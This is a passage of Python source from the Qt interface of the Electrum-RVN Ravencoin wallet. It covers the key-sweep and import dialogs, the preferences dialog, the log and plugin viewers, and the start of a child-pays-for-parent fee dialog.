    hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    vbox.addLayout(hbox_top)
    keys_e = ScanQRTextEdit(allow_multi=True)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        # fall back for wallet types that lack unused/receiving address APIs
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)  # enabled only when keys and address validate
    def get_address():
        # destination address, or None (implicit) when invalid
        addr = str(address_e.text()).strip()
        if ravencoin.is_address(addr):
            return addr
    def get_pk(*, raise_on_error=False):
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text, raise_on_error=raise_on_error)
    def on_edit():
        # re-validate on every keystroke in either field
        valid_privkeys = False
        try:
            valid_privkeys = get_pk(raise_on_error=True) is not None
        except Exception as e:
            button.setToolTip(f'{_("Error")}: {str(e)}')
        else:
            button.setToolTip('')
        button.setEnabled(get_address() is not None and valid_privkeys)
    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_address)
    on_address(str(address_e.text()))
    if not d.exec_():
        return
    # user pressed "sweep"
    addr = get_address()
    try:
        self.wallet.check_address(addr)
    except InternalAddressCorruption as e:
        # re-raise so the corruption is not silently swallowed
        self.show_error(str(e))
        raise
    try:
        coins, keypairs = sweep_preparations(get_pk(), self.network)
    except Exception as e:  # FIXME too broad...
        self.show_message(str(e))
        return
    self.do_clear()
    self.tx_external_keypairs = keypairs
    self.spend_coins(coins)
    self.payto_e.setText(addr)
    self.spend_max()
    # freeze the pre-filled fields so the user can only confirm/broadcast
    self.payto_e.setFrozen(True)
    self.amount_e.setFrozen(True)
    self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
    """Generic import flow: prompt for whitespace-separated tokens, feed
    them to *func*, report successes/failures, then refresh the views.

    *func* must return a (good_inputs, bad_inputs) pair where bad_inputs
    is a list of (key, error_message) tuples.
    """
    text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
    if not text:
        return
    good_inputs, bad_inputs = func(str(text).split())
    if good_inputs:
        # show at most ten entries, with an ellipsis for the rest
        preview = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10:
            preview += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + preview)
    if bad_inputs:
        failures = '\n'.join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
        if len(bad_inputs) > 10:
            failures += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + failures)
    for view in (self.address_list, self.asset_list, self.history_list):
        view.update()
def import_addresses(self):
    """Prompt for addresses and add them to an address-importing wallet."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'), _("Enter addresses") + ':',
                    self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
    """Prompt for WIF private keys and import them into the wallet.

    The @protected decorator supplies the wallet password.
    """
    if not self.wallet.can_import_privkey():
        return
    header = QHBoxLayout()
    header.addWidget(QLabel(_("Enter private keys") + ':'))
    header.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(_('Import private keys'), header,
                    lambda keys: self.wallet.import_private_keys(keys, password))
def update_fiat(self):
    """Show/hide fiat amount fields and refresh views after an FX change."""
    fiat_on = bool(self.fx and self.fx.is_enabled())
    for edit in (self.fiat_send_e, self.fiat_receive_e):
        edit.setVisible(fiat_on)
    self.history_list.update()
    self.address_list.refresh_headers()
    self.address_list.update()
    self.update_status()
def settings_dialog(self):
    """Show the modal Preferences dialog.

    Builds lists of (label, widget) rows for each tab — Fees, Transactions,
    General, Assets, Fiat, Identity — wiring every widget directly to
    self.config / self.wallet, then applies post-close side effects
    (FX refresh, asset list persistence, restart warning).
    """
    self.need_restart = False
    d = WindowModalDialog(self, _('Preferences'))
    vbox = QVBoxLayout()
    tabs = QTabWidget()
    gui_widgets = []
    fee_widgets = []
    tx_widgets = []
    id_widgets = []
    asset_widgets = []
    # language
    lang_help = _('Select which language is used in the GUI (after restart).')
    lang_label = HelpLabel(_('Language') + ':', lang_help)
    lang_combo = QComboBox()
    from electrum.i18n import languages
    lang_combo.addItems(list(languages.values()))
    lang_keys = list(languages.keys())
    lang_cur_setting = self.config.get("language", '')
    try:
        index = lang_keys.index(lang_cur_setting)
    except ValueError:  # not in list
        index = 0
    lang_combo.setCurrentIndex(index)
    if not self.config.is_modifiable('language'):
        for w in [lang_combo, lang_label]: w.setEnabled(False)
    def on_lang(x):
        lang_request = list(languages.keys())[lang_combo.currentIndex()]
        if lang_request != self.config.get('language'):
            self.config.set_key("language", lang_request, True)
            self.need_restart = True
    lang_combo.currentIndexChanged.connect(on_lang)
    gui_widgets.append((lang_label, lang_combo))
    # number of decimal zeros shown after amounts
    nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
    nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
    nz = QSpinBox()
    nz.setMinimum(0)
    nz.setMaximum(self.decimal_point)
    nz.setValue(self.num_zeros)
    if not self.config.is_modifiable('num_zeros'):
        for w in [nz, nz_label]: w.setEnabled(False)
    def on_nz():
        value = nz.value()
        if self.num_zeros != value:
            self.num_zeros = value
            self.config.set_key('num_zeros', value, True)
            self.history_list.update()
            self.address_list.update()
    nz.valueChanged.connect(on_nz)
    gui_widgets.append((nz_label, nz))
    # fee estimation method
    msg = '\n'.join([
        _('Time based: fee rate is based on average confirmation time estimates'),
        _('Mempool based: fee rate is targeting a depth in the memory pool')
    ]
    )
    fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
    fee_type_combo = QComboBox()
    fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
    # index mapping: 0=Static, 1=ETA (dynfee), 2=Mempool (dynfee+mempool)
    fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
    def on_fee_type(x):
        self.config.set_key('mempool_fees', x==2)
        self.config.set_key('dynamic_fees', x>0)
        self.fee_slider.update()
    fee_type_combo.currentIndexChanged.connect(on_fee_type)
    fee_widgets.append((fee_type_label, fee_type_combo))
    feebox_cb = QCheckBox(_('Edit fees manually'))
    feebox_cb.setChecked(self.config.get('show_fee', False))
    feebox_cb.setToolTip(_("Show fee edit box in send tab."))
    def on_feebox(x):
        self.config.set_key('show_fee', x == Qt.Checked)
        self.fee_adv_controls.setVisible(bool(x))
    feebox_cb.stateChanged.connect(on_feebox)
    fee_widgets.append((feebox_cb, None))
    # RBF checkbox is built (batch_rbf depends on it) but not shown in the UI
    use_rbf = self.config.get('use_rbf', False)
    use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
    use_rbf_cb.setChecked(use_rbf)
    use_rbf_cb.setToolTip(
        _('If you check this box, your transactions will be marked as non-final,') + '\n' + \
        _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
        _('Note that some merchants do not accept non-final transactions until they are confirmed.'))
    def on_use_rbf(x):
        self.config.set_key('use_rbf', bool(x))
        batch_rbf_cb.setEnabled(bool(x))
    use_rbf_cb.stateChanged.connect(on_use_rbf)
    #fee_widgets.append((use_rbf_cb, None))
    batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
    batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
    batch_rbf_cb.setEnabled(use_rbf)
    batch_rbf_cb.setToolTip(
        _('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
        _('This will save fees.'))
    def on_batch_rbf(x):
        self.config.set_key('batch_rbf', bool(x))
    batch_rbf_cb.stateChanged.connect(on_batch_rbf)
    fee_widgets.append((batch_rbf_cb, None))
    # OpenAlias identity
    msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
          + _('The following alias providers are available:') + '\n'\
          + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
          + 'For more information, see https://openalias.org'
    alias_label = HelpLabel(_('OpenAlias') + ':', msg)
    alias = self.config.get('alias','')
    alias_e = QLineEdit(alias)
    def set_alias_color():
        # green = validated alias, red = lookup failed or not validated
        if not self.config.get('alias'):
            alias_e.setStyleSheet("")
            return
        if self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
        else:
            alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    def on_alias_edit():
        alias_e.setStyleSheet("")
        alias = str(alias_e.text())
        self.config.set_key('alias', alias, True)
        if alias:
            # async DNS lookup; result arrives via alias_received_signal
            self.fetch_alias()
    set_alias_color()
    self.alias_received_signal.connect(set_alias_color)
    alias_e.editingFinished.connect(on_alias_edit)
    id_widgets.append((alias_label, alias_e))
    # SSL certificate
    msg = ' '.join([
        _('SSL certificate used to sign payment requests.'),
        _('Use setconfig to set ssl_chain and ssl_privkey.'),
    ])
    if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
        try:
            SSL_identity = paymentrequest.check_ssl_config(self.config)
            SSL_error = None
        except BaseException as e:
            SSL_identity = "error"
            SSL_error = str(e)
    else:
        SSL_identity = ""
        SSL_error = None
    SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
    SSL_id_e = QLineEdit(SSL_identity)
    SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
    if SSL_error:
        SSL_id_e.setToolTip(SSL_error)
    SSL_id_e.setReadOnly(True)
    id_widgets.append((SSL_id_label, SSL_id_e))
    # base unit (RVN / mRVN / bits / sat)
    units = base_units_list
    msg = (_('Base unit of your wallet.')
           + '\n1 RVN = 1000 mRVN. 1 mRVN = 1000 bits. 1 bit = 100 sat.\n'
           + _('This setting affects the Send tab, and all balance related fields.'))
    unit_label = HelpLabel(_('Base unit') + ':', msg)
    unit_combo = QComboBox()
    unit_combo.addItems(units)
    unit_combo.setCurrentIndex(units.index(self.base_unit()))
    def on_unit(x, nz):
        unit_result = units[unit_combo.currentIndex()]
        if self.base_unit() == unit_result:
            return
        # preserve the amounts currently typed in while switching units
        edits = self.amount_e, self.fee_e, self.receive_amount_e
        amounts = [edit.get_amount() for edit in edits]
        self.decimal_point = base_unit_name_to_decimal_point(unit_result)
        self.config.set_key('decimal_point', self.decimal_point, True)
        nz.setMaximum(self.decimal_point)
        self.history_list.update()
        self.request_list.update()
        self.address_list.update()
        for edit, amount in zip(edits, amounts):
            edit.setAmount(amount)
        self.update_status()
    unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
    gui_widgets.append((unit_label, unit_combo))
    # online block explorer
    block_explorers = sorted(util.block_explorer_info().keys())
    msg = _('Choose which online block explorer to use for functions that open a web browser')
    block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
    block_ex_combo = QComboBox()
    block_ex_combo.addItems(block_explorers)
    block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
    def on_be(x):
        be_result = block_explorers[block_ex_combo.currentIndex()]
        self.config.set_key('block_explorer', be_result, True)
    block_ex_combo.currentIndexChanged.connect(on_be)
    gui_widgets.append((block_ex_label, block_ex_combo))
    # online IPFS explorer
    ipfs_explorers = sorted(util.ipfs_explorer_info().keys())
    msg = _('Choose which online IPFS explorer to use for functions that open a web browser')
    ipfs_ex_label = HelpLabel(_('Online IPFS Explorer') + ':', msg)
    ipfs_ex_combo = QComboBox()
    ipfs_ex_combo.addItems(ipfs_explorers)
    ipfs_ex_combo.setCurrentIndex(ipfs_ex_combo.findText(util.ipfs_explorer(self.config)))
    def on_ie(x):
        ie_result = ipfs_explorers[ipfs_ex_combo.currentIndex()]
        self.config.set_key('ipfs_explorer', ie_result, True)
    ipfs_ex_combo.currentIndexChanged.connect(on_ie)
    gui_widgets.append((ipfs_ex_label, ipfs_ex_combo))
    # QR scanner video device (requires zbar)
    from electrum import qrscanner
    system_cameras = qrscanner._find_system_cameras()
    qr_combo = QComboBox()
    qr_combo.addItem("Default","default")
    for camera, device in system_cameras.items():
        qr_combo.addItem(camera, device)
    #combo.addItem("Manually specify a device", config.get("video_device"))
    index = qr_combo.findData(self.config.get("video_device"))
    qr_combo.setCurrentIndex(index)
    msg = _("Install the zbar package to enable this.")
    qr_label = HelpLabel(_('Video Device') + ':', msg)
    qr_combo.setEnabled(qrscanner.libzbar is not None)
    on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
    qr_combo.currentIndexChanged.connect(on_video_device)
    gui_widgets.append((qr_label, qr_combo))
    # color theme (requires restart)
    colortheme_combo = QComboBox()
    colortheme_combo.addItem(_('Light'), 'default')
    colortheme_combo.addItem(_('Dark'), 'dark')
    index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'dark'))
    colortheme_combo.setCurrentIndex(index)
    colortheme_label = QLabel(_('Color theme') + ':')
    def on_colortheme(x):
        self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
        self.need_restart = True
    colortheme_combo.currentIndexChanged.connect(on_colortheme)
    gui_widgets.append((colortheme_label, colortheme_combo))
    # automatic update check
    updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
    updatecheck_cb.setChecked(self.config.get('check_updates', False))
    def on_set_updatecheck(v):
        self.config.set_key('check_updates', v == Qt.Checked, save=True)
    updatecheck_cb.stateChanged.connect(on_set_updatecheck)
    gui_widgets.append((updatecheck_cb, None))
    # file logging (requires restart)
    filelogging_cb = QCheckBox(_("Write logs to file"))
    filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
    def on_set_filelogging(v):
        self.config.set_key('log_to_file', v == Qt.Checked, save=True)
        self.need_restart = True
    filelogging_cb.stateChanged.connect(on_set_filelogging)
    filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
    gui_widgets.append((filelogging_cb, None))
    # change-address behavior
    usechange_cb = QCheckBox(_('Use change addresses'))
    usechange_cb.setChecked(self.wallet.use_change)
    if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
    def on_usechange(x):
        usechange_result = x == Qt.Checked
        if self.wallet.use_change != usechange_result:
            self.wallet.use_change = usechange_result
            self.wallet.storage.put('use_change', self.wallet.use_change)
            # multiple-change only makes sense when change is in use at all
            multiple_cb.setEnabled(self.wallet.use_change)
    usechange_cb.stateChanged.connect(on_usechange)
    usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
    tx_widgets.append((usechange_cb, None))
    def on_multiple(x):
        multiple = x == Qt.Checked
        if self.wallet.multiple_change != multiple:
            self.wallet.multiple_change = multiple
            self.wallet.storage.put('multiple_change', multiple)
    multiple_change = self.wallet.multiple_change
    multiple_cb = QCheckBox(_('Use multiple change addresses'))
    multiple_cb.setEnabled(self.wallet.use_change)
    multiple_cb.setToolTip('\n'.join([
        _('In some cases, use up to 3 change addresses in order to break '
          'up large coin amounts and obfuscate the recipient address.'),
        _('This may result in higher transactions fees.')
    ]))
    multiple_cb.setChecked(multiple_change)
    multiple_cb.stateChanged.connect(on_multiple)
    tx_widgets.append((multiple_cb, None))
    def fmt_docs(key, klass):
        # render a coin-chooser's docstring as a one-paragraph description
        lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
        return '\n'.join([key, "", " ".join(lines)])
    # coin (UTXO) selection method — only offered if more than one exists
    choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
    if len(choosers) > 1:
        chooser_name = coinchooser.get_name(self.config)
        msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
        msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
        chooser_label = HelpLabel(_('Coin selection') + ':', msg)
        chooser_combo = QComboBox()
        chooser_combo.addItems(choosers)
        i = choosers.index(chooser_name) if chooser_name in choosers else 0
        chooser_combo.setCurrentIndex(i)
        def on_chooser(x):
            chooser_name = choosers[chooser_combo.currentIndex()]
            self.config.set_key('coin_chooser', chooser_name)
        chooser_combo.currentIndexChanged.connect(on_chooser)
        tx_widgets.append((chooser_label, chooser_combo))
    def on_unconf(x):
        self.config.set_key('confirmed_only', bool(x))
    conf_only = self.config.get('confirmed_only', False)
    unconf_cb = QCheckBox(_('Spend only confirmed coins'))
    unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
    unconf_cb.setChecked(conf_only)
    unconf_cb.stateChanged.connect(on_unconf)
    tx_widgets.append((unconf_cb, None))
    def on_outrounding(x):
        self.config.set_key('coin_chooser_output_rounding', bool(x))
    enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
    outrounding_cb = QCheckBox(_('Enable output value rounding'))
    outrounding_cb.setToolTip(
        _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
        _('This might improve your privacy somewhat.') + '\n' +
        _('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
    outrounding_cb.setChecked(enable_outrounding)
    outrounding_cb.stateChanged.connect(on_outrounding)
    tx_widgets.append((outrounding_cb, None))
    # Fiat Currency
    hist_checkbox = QCheckBox()
    hist_capgains_checkbox = QCheckBox()
    fiat_address_checkbox = QCheckBox()
    ccy_combo = QComboBox()
    ex_combo = QComboBox()
    def update_currencies():
        if not self.fx: return
        currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
        ccy_combo.clear()
        ccy_combo.addItems([_('None')] + currencies)
        if self.fx.is_enabled():
            ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
    def update_history_cb():
        if not self.fx: return
        hist_checkbox.setChecked(self.fx.get_history_config())
        hist_checkbox.setEnabled(self.fx.is_enabled())
    def update_fiat_address_cb():
        if not self.fx: return
        fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
    def update_history_capgains_cb():
        if not self.fx: return
        hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
        hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
    def update_exchanges():
        if not self.fx: return
        b = self.fx.is_enabled()
        ex_combo.setEnabled(b)
        if b:
            h = self.fx.get_history_config()
            c = self.fx.get_currency()
            exchanges = self.fx.get_exchanges_by_ccy(c, h)
        else:
            exchanges = self.fx.get_exchanges_by_ccy('USD', False)
        # blockSignals prevents on_exchange firing while the list is rebuilt
        ex_combo.blockSignals(True)
        ex_combo.clear()
        ex_combo.addItems(sorted(exchanges))
        ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
        ex_combo.blockSignals(False)
    def on_currency(hh):
        if not self.fx: return
        # index 0 is the _('None') entry => fiat disabled
        b = bool(ccy_combo.currentIndex())
        ccy = str(ccy_combo.currentText()) if b else None
        self.fx.set_enabled(b)
        if b and ccy != self.fx.ccy:
            self.fx.set_currency(ccy)
        update_history_cb()
        update_exchanges()
        self.update_fiat()
    def on_exchange(idx):
        exchange = str(ex_combo.currentText())
        if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
            self.fx.set_exchange(exchange)
    def on_history(checked):
        if not self.fx: return
        self.fx.set_history_config(checked)
        update_exchanges()
        self.history_model.refresh('on_history')
        if self.fx.is_enabled() and checked:
            self.fx.trigger_update()
        update_history_capgains_cb()
    def on_history_capgains(checked):
        if not self.fx: return
        self.fx.set_history_capital_gains_config(checked)
        self.history_model.refresh('on_history_capgains')
    def on_fiat_address(checked):
        if not self.fx: return
        self.fx.set_fiat_address_config(checked)
        self.address_list.refresh_headers()
        self.address_list.update()
    # initialize widget state from current FX settings, then connect
    update_currencies()
    update_history_cb()
    update_history_capgains_cb()
    update_fiat_address_cb()
    update_exchanges()
    ccy_combo.currentIndexChanged.connect(on_currency)
    hist_checkbox.stateChanged.connect(on_history)
    hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
    fiat_address_checkbox.stateChanged.connect(on_fiat_address)
    ex_combo.currentIndexChanged.connect(on_exchange)
    fiat_widgets = []
    fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
    fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
    fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
    fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
    fiat_widgets.append((QLabel(_('Source')), ex_combo))
    # Asset black list
    self.need_write_blacklist = False
    msg = 'A list of regular expressions separated by new lines. ' \
          'If an asset\'s name matches any regular expression in this list, ' \
          'it will be hidden from view.'
    regex_b = '\n'.join(self.asset_blacklist)
    blacklist_info = HelpLabel(_('Asset Blacklist') + ':', msg)
    regex_e_b = QTextEdit()
    regex_e_b.setLineWrapMode(QTextEdit.NoWrap)
    regex_e_b.setPlainText(regex_b)
    def update_blacklist():
        self.asset_blacklist = regex_e_b.toPlainText().split('\n')
        if not self.asset_blacklist[0]:  # We don't want an empty string, we want an empty regex
            self.asset_blacklist = []
        self.need_write_blacklist = True
    regex_e_b.textChanged.connect(update_blacklist)
    asset_widgets.append((blacklist_info, regex_e_b))
    # Asset white list
    self.need_write_whitelist = False
    # NOTE(review): 'seperated' is a typo, but this is a user-visible runtime
    # string — left unchanged here to keep this edit documentation-only.
    msg = 'A list of regular expressions seperated by new lines. ' \
          'Assets that match any of these regular expressions and would normally ' \
          'be blocked by the blacklist are shown.'
    regex_w = '\n'.join(self.asset_whitelist)
    whitelist_info = HelpLabel(_('Asset Whitelist') + ':', msg)
    regex_e_w = QTextEdit()
    regex_e_w.setLineWrapMode(QTextEdit.NoWrap)
    regex_e_w.setPlainText(regex_w)
    def update_whitelist():
        self.asset_whitelist = regex_e_w.toPlainText().split('\n')
        if not self.asset_whitelist[0]:
            self.asset_whitelist = []
        self.need_write_whitelist = True
    regex_e_w.textChanged.connect(update_whitelist)
    asset_widgets.append((whitelist_info, regex_e_w))
    show_spam_cb = QCheckBox(_("Show assets hidden from view"))
    show_spam_cb.setChecked(self.config.get('show_spam_assets', False))
    def on_set_show_spam(v):
        self.config.set_key('show_spam_assets', v == Qt.Checked, save=True)
        self.asset_list.update()
        self.history_model.refresh('Toggled show spam assets')
    show_spam_cb.stateChanged.connect(on_set_show_spam)
    asset_widgets.append((show_spam_cb, None))
    # assemble tabs from the widget lists built above
    tabs_info = [
        (fee_widgets, _('Fees')),
        (tx_widgets, _('Transactions')),
        (gui_widgets, _('General')),
        (asset_widgets, _('Assets')),
        (fiat_widgets, _('Fiat')),
        (id_widgets, _('Identity')),
    ]
    for widgets, name in tabs_info:
        tab = QWidget()
        grid = QGridLayout(tab)
        grid.setColumnStretch(0,1)
        for a,b in widgets:
            i = grid.rowCount()
            if b:
                if a:
                    grid.addWidget(a, i, 0)
                grid.addWidget(b, i, 1)
            else:
                # single-widget row spans both columns
                grid.addWidget(a, i, 0, 1, 2)
        tabs.addTab(tab, name)
    vbox.addWidget(tabs)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    # run the dialog
    d.exec_()
    # post-close side effects
    if self.fx:
        self.fx.trigger_update()
    self.alias_received_signal.disconnect(set_alias_color)
    if self.need_write_blacklist:
        self.config.set_key('asset_blacklist', self.asset_blacklist, True)
    if self.need_write_whitelist:
        self.config.set_key('asset_whitelist', self.asset_whitelist, True)
    if self.need_write_blacklist or self.need_write_whitelist:
        self.asset_list.update()
        self.history_model.refresh('Changed asset white or black list')
    run_hook('close_settings_dialog')
    if self.need_restart:
        self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler: run clean_up() exactly once, then accept."""
    # It seems in some rare cases this closeEvent() is called twice;
    # the cleaned_up flag makes the teardown idempotent.
    first_close = not self.cleaned_up
    if first_close:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Tear down window/wallet resources; called once from closeEvent()."""
    self.wallet.thread.stop()
    if self.network:
        # detach our callbacks so the network no longer references this window
        self.network.unregister_callback(self.on_network)
        self.network.unregister_callback(self.on_quotes)
        self.network.unregister_callback(self.on_history)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # persist geometry so the window can be restored at next launch
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
                                              g.width(),g.height()])
    # keep only the last 50 console commands
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def logview_dialog(self):
    """Show a modal dialog that tails the on-disk log file, if enabled."""
    from electrum.logging import get_logfile_path, electrum_logger
    def watch_file(fn,logviewer):
        # poor man's tail: reload the whole file whenever its mtime advances
        if os.path.exists(fn):
            mtime = os.path.getmtime(fn)
            if mtime > self.logfile_mtime:
                # file modified
                self.logfile_mtime = mtime
                logviewer.clear()
                with open(fn,"r") as f:
                    for line in f:
                        # drop the leading timestamp (everything up to 'Z |')
                        logviewer.append(line.partition('Z |')[2].lstrip(' ').rstrip('\n'))
    d = WindowModalDialog(self, _('Log Viewer'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    self.logviewer = QTextEdit()
    self.logviewer.setAcceptRichText(False)
    self.logviewer.setReadOnly(True)
    # placeholder shown when file logging is disabled
    self.logviewer.setPlainText("Enable 'Write logs to file' in Preferences -> General and restart Electrum-RVN to view logs here")
    layout.addWidget(self.logviewer, 1, 1)
    logfile = get_logfile_path()
    self.logtimer = QTimer(self)
    if logfile is not None:
        load_logfile = partial(watch_file,logfile,self.logviewer)
        self.logfile_mtime = 0  # force the first load
        load_logfile()
        # poll every 2.5s while the dialog is open
        self.logtimer.timeout.connect(load_logfile)
        self.logtimer.start(2500)
    d.exec_()
    self.logtimer.stop()
def plugins_dialog(self):
    """Show the plugins dialog: enable/disable plugins, open their settings."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    # cache of lazily-created per-plugin settings widgets, keyed by name
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            # settings are only interactive while the plugin is enabled
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        if descr.get('registers_keystore'):
            # keystore (hardware-wallet) plugins are managed elsewhere
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # checkbox is usable if the plugin could be loaded, or is loaded
            # and the user is allowed to disable it
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # a broken plugin description must not break the whole dialog
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Open the Child-Pays-For-Parent dialog and show the resulting child tx.

    Arguments:
        parent_tx: the unconfirmed transaction to accelerate.
        new_tx: template transaction spending an output of parent_tx back
            to this wallet; its output value caps the child fee.
    Shows the child transaction dialog on confirmation; returns silently
    on cancel or when fee information is unavailable.
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_fee = self.wallet.get_tx_fee(parent_tx)
    if parent_fee is None:
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
